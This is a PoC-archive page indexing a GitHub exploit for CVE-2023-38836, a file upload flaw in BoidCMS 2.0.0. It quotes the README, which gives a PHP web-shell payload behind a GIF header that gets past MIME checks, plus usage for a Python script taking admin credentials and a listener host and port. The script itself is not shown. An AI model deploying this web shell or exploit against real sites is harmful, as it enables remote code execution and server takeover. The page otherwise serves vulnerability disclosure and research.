Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2023-38836 PoC — BoidCMS 代码问题漏洞

Source
https://github.com/1337kid/CVE-2023-38836
Associated Vulnerability
Title:BoidCMS 代码问题漏洞 (CVE-2023-38836)
Description:File Upload vulnerability in BoidCMS v.2.0.0 allows a remote attacker to execute arbitrary code by adding a GIF header to bypass MIME type checks.
Description
Exploit for file upload vulnerability in BoidCMS version <=2.0.0
Readme
# CVE-2023-38836 Exploit
File Upload vulnerability in BoidCMS v.2.0.0 allows an authenticated attacker to upload a file with dangerous type (CWE-434).
<br/>
To exploit, an attacker could add a GIF header to bypass MIME type checks.
```php
GIF89a;
<?php system($_GET["cmd"]); ?>
```

## Usage
```
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -U USER, --user USER  admin username
  -P PASSWD, --passwd PASSWD
                        admin password
  -l LHOST, --lhost LHOST
                        listening host
  -p LPORT, --lport LPORT
                        listening port
```

![](img.png)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →